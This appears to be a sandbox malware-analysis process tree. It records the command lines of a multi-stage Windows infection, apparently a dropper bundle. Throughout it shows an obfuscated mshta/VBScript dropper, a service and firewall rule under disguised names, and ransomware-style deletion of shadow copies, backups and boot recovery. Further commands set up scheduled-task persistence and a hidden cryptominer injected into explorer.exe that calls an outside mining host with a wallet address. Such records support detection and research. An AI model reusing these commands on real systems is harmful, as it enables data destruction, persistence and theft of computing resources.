"C:\Windows\System32\mshta.exe" vbSCRipt:ClOSe( creATEoBJEcT("WscRIpT.sHEll" ).RUN("Cmd /Q /C tYPe ""C:\Users\Admin\Documents\AOrVfqejFU4lQIMMYFfynLWS.exe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if """" == """" for %W iN ( ""C:\Users\Admin\Documents\AOrVfqejFU4lQIMMYFfynLWS.exe"" ) do taskkill -IM ""%~nXW"" -f " ,0 ,TRUE ) )
1⤵
PID:388

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\Documents\AOrVfqejFU4lQIMMYFfynLWS.exe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if ""=="" for %W iN ( "C:\Users\Admin\Documents\AOrVfqejFU4lQIMMYFfynLWS.exe") do taskkill -IM "%~nXW" -f
2⤵
- Executes dropped EXE
PID:3912

C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe
WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9
3⤵
- Executes dropped EXE
PID:2812

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbSCRipt:ClOSe( creATEoBJEcT("WscRIpT.sHEll" ).RUN("Cmd /Q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if ""-PifOcLbay~PF~N8a_e9RyKpu9 "" == """" for %W iN ( ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" ) do taskkill -IM ""%~nXW"" -f " ,0 ,TRUE ) )
4⤵
PID:5260

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "-PifOcLbay~PF~N8a_e9RyKpu9 "=="" for %W iN ( "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe") do taskkill -IM "%~nXW" -f
5⤵
PID:5628

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" ~IWm4Wh.I,nKhkoYTFE
4⤵
PID:4228

C:\Windows\SysWOW64\taskkill.exe
taskkill -IM "AOrVfqejFU4lQIMMYFfynLWS.exe" -f
3⤵
- Kills process with taskkill
PID:5228

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:6980

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
2⤵
PID:7032

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SystemNetworkService
1⤵
PID:4144

C:\ProgramData\rtfhln\eqgh.exe
C:\ProgramData\rtfhln\eqgh.exe start
1⤵
PID:7856

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:6148

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding AF374E37685F7341C0DBDB5B0BCAAEB5 C
2⤵
PID:7012

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding DA1CF6927405A3ACBB9761A896438142
2⤵
PID:9152

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding AC306E45C56CCCECD58E77BFC7CF1FE0 C
2⤵
PID:4804

C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 325C49AC2D7F2767B4973E177B5BBE7F C
2⤵
PID:5192

C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"
2⤵
PID:11040

C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default
3⤵
PID:11092

C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"
4⤵
PID:10028

C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x1dc,0x1e0,0x1e4,0x1d0,0x1e8,0x7ff9cff4dec0,0x7ff9cff4ded0,0x7ff9cff4dee0
5⤵
PID:9144

C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1628,11625384269609976087,4531879473126642331,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10028_1620612121" --mojo-platform-channel-handle=1692 /prefetch:8
5⤵
PID:7180

C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1628,11625384269609976087,4531879473126642331,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10028_1620612121" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1644 /prefetch:2
5⤵
PID:10400

C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1628,11625384269609976087,4531879473126642331,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10028_1620612121" --mojo-platform-channel-handle=2112 /prefetch:8
5⤵
PID:9416

C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1628,11625384269609976087,4531879473126642331,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10028_1620612121" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2528 /prefetch:1
5⤵
PID:7784

C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1628,11625384269609976087,4531879473126642331,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10028_1620612121" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2512 /prefetch:1
5⤵
PID:3472

C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1628,11625384269609976087,4531879473126642331,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10028_1620612121" --mojo-platform-channel-handle=3092 /prefetch:8
5⤵
PID:8932

C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1628,11625384269609976087,4531879473126642331,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10028_1620612121" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3192 /prefetch:2
5⤵
PID:6164

C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1628,11625384269609976087,4531879473126642331,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10028_1620612121" --mojo-platform-channel-handle=3628 /prefetch:8
5⤵
PID:7872

C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1628,11625384269609976087,4531879473126642331,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10028_1620612121" --mojo-platform-channel-handle=3460 /prefetch:8
5⤵
PID:4528

C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1628,11625384269609976087,4531879473126642331,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10028_1620612121" --mojo-platform-channel-handle=3544 /prefetch:8
5⤵
PID:5208

C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1628,11625384269609976087,4531879473126642331,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10028_1620612121" --mojo-platform-channel-handle=992 /prefetch:8
5⤵
PID:5860

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_EED3.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"
3⤵
PID:6228

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:8676

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
2⤵
PID:6368

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:684

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
2⤵
PID:1288

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:9872

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:9988

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:9828

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6644

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:10208

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
1⤵
PID:9928

C:\Windows\system32\DrvInst.exe
DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{6dc58bba-1621-0c41-8cee-4316f8c4b64d}\oemvista.inf" "9" "4d14a44ff" "0000000000000174" "WinSta0\Default" "0000000000000178" "208" "c:\program files (x86)\maskvpn\driver\win764"
2⤵
PID:7408

C:\Windows\system32\DrvInst.exe
DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000174"
2⤵
PID:5536

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
1⤵
PID:5432

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
1⤵
PID:8236

C:\Users\Admin\AppData\Local\Temp\4EA.exe
C:\Users\Admin\AppData\Local\Temp\4EA.exe
1⤵
PID:208

C:\Users\Admin\AppData\Local\Temp\837.exe
C:\Users\Admin\AppData\Local\Temp\837.exe
1⤵
PID:10144

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\hgyipkpg\
2⤵
PID:7020

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\vieucjeo.exe" C:\Windows\SysWOW64\hgyipkpg\
2⤵
PID:9404

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" create hgyipkpg binPath= "C:\Windows\SysWOW64\hgyipkpg\vieucjeo.exe /d\"C:\Users\Admin\AppData\Local\Temp\837.exe\"" type= own start= auto DisplayName= "wifi support"
2⤵
PID:9856

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" description hgyipkpg "wifi internet conection"
2⤵
PID:7176

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start hgyipkpg
2⤵
PID:9732

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
2⤵
PID:7276

C:\Users\Admin\dwokith.exe
"C:\Users\Admin\dwokith.exe" /d"C:\Users\Admin\AppData\Local\Temp\837.exe"
2⤵
PID:9528

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\wottasmq.exe" C:\Windows\SysWOW64\hgyipkpg\
3⤵
PID:10768

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" config hgyipkpg binPath= "C:\Windows\SysWOW64\hgyipkpg\wottasmq.exe /d\"C:\Users\Admin\dwokith.exe\""
3⤵
PID:10892

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start hgyipkpg
3⤵
PID:11028

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
3⤵
PID:11156

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4477.bat" "
3⤵
PID:11204

C:\Users\Admin\AppData\Local\Temp\EFE.exe
C:\Users\Admin\AppData\Local\Temp\EFE.exe
1⤵
PID:9456

C:\Users\Admin\AppData\Local\Temp\1960.exe
C:\Users\Admin\AppData\Local\Temp\1960.exe
1⤵
PID:5652

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:3540

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
2⤵
PID:9836

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:9728

C:\Users\Admin\AppData\Local\Temp\3AE3.exe
C:\Users\Admin\AppData\Local\Temp\3AE3.exe
1⤵
PID:6820

C:\Users\Admin\AppData\Local\Temp\40B0.exe
C:\Users\Admin\AppData\Local\Temp\40B0.exe
1⤵
PID:5292

C:\Windows\SysWOW64\notepad.exe
notepad.exe
2⤵
PID:4076

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\explorer.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\explorer.exe" -start
2⤵
PID:8652

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\explorer.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\explorer.exe" -agent 0
3⤵
PID:10436

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\~temp001.bat
3⤵
PID:10356

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic shadowcopy delete
4⤵
PID:4620

C:\Windows\SysWOW64\vssadmin.exe
vssadmin delete shadows /all /quiet
4⤵
- Interacts with shadow copies
PID:9680

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
3⤵
PID:10288

C:\Windows\SysWOW64\vssadmin.exe
vssadmin delete shadows /all /quiet
4⤵
- Interacts with shadow copies
PID:11224

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
3⤵
PID:10012

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
3⤵
PID:5600

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
3⤵
PID:7472

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
3⤵
PID:8168

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic shadowcopy delete
4⤵
PID:9476

C:\Windows\SysWOW64\notepad.exe
notepad.exe
3⤵
PID:4728

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5488

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe"
1⤵
PID:10196

C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
MaskVPNUpdate.exe /silent
2⤵
PID:10248

C:\Users\Admin\AppData\Local\Temp\6281.exe
C:\Users\Admin\AppData\Local\Temp\6281.exe
1⤵
PID:4732

C:\Users\Admin\Documents\Update.exe
"C:\Users\Admin\Documents\Update.exe"
2⤵
PID:9616

C:\Users\Admin\AppData\Local\Temp\DriverUpdate.exe
"C:\Users\Admin\AppData\Local\Temp\DriverUpdate.exe"
3⤵
PID:6444

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WindowsSecurity" /tr '"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"' & exit
4⤵
PID:9200

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "WindowsSecurity" /tr '"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"'
5⤵
- Creates scheduled task(s)
PID:6528

C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe
"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"
4⤵
PID:11080

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "WindowsSecurity" /tr '"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"' & exit
5⤵
PID:11220

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "WindowsSecurity" /tr '"C:\Users\Admin\AppData\Roaming\WindowsSecurity.exe"'
6⤵
- Creates scheduled task(s)
PID:6660

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
5⤵
PID:10788

C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=antivirus.windowsdefenderautoupdater.me:3333 --user=4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQuiWzFUXCscKHeTzpD --pass=x --cpu-max-threads-hint=30 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=3 --cinit-idle-cpu=90 --nicehash --cinit-stealth
5⤵
PID:9816

C:\Users\Admin\AppData\Local\Temp\Clip_.exe
"C:\Users\Admin\AppData\Local\Temp\Clip_.exe"
3⤵
PID:9320

C:\Users\Admin\AppData\Local\Temp\Red1_.exe
"C:\Users\Admin\AppData\Local\Temp\Red1_.exe"
3⤵
PID:5264

C:\Users\Admin\AppData\Local\Temp\SteamUpdate.exe
"C:\Users\Admin\AppData\Local\Temp\SteamUpdate.exe"
3⤵
PID:10000

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "VideoDriver" /tr '"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"' & exit
4⤵
PID:7196

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "VideoDriver" /tr '"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"'
5⤵
- Creates scheduled task(s)
PID:9760

C:\Users\Admin\AppData\Roaming\VideoDriver.exe
"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"
4⤵
PID:8764

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "VideoDriver" /tr '"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"' & exit
5⤵
PID:11188

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "VideoDriver" /tr '"C:\Users\Admin\AppData\Roaming\VideoDriver.exe"'
6⤵
- Creates scheduled task(s)
PID:5660

C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"
5⤵
PID:10724

C:\Users\Admin\AppData\Local\Temp\UpdateCore.exe
"C:\Users\Admin\AppData\Local\Temp\UpdateCore.exe"
3⤵
PID:10256

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 1 -w 100 > Nul & Del "C:\Users\Admin\AppData\Local\Temp\6281.exe"& ping 1.1.1.1 -n 1 -w 900 > Nul & Del "C:\Users\Admin\AppData\Local\Temp\6281.exe"
2⤵
- Blocklisted process makes network request
- Executes dropped EXE
PID:4584

C:\Windows\SysWOW64\PING.EXE
ping 1.1.1.1 -n 1 -w 100
3⤵
- Runs ping.exe
PID:9476

C:\Windows\SysWOW64\PING.EXE
ping 1.1.1.1 -n 1 -w 900
3⤵
- Runs ping.exe
PID:10400

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:9820

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:7712

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:6976

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:8624

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:3896

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:7528

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:8616

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:4792

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:1076

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:10968

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:9888

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:10180

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:420

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:11108

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4524

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:10068

C:\Users\Admin\AppData\Roaming\gweusii
C:\Users\Admin\AppData\Roaming\gweusii
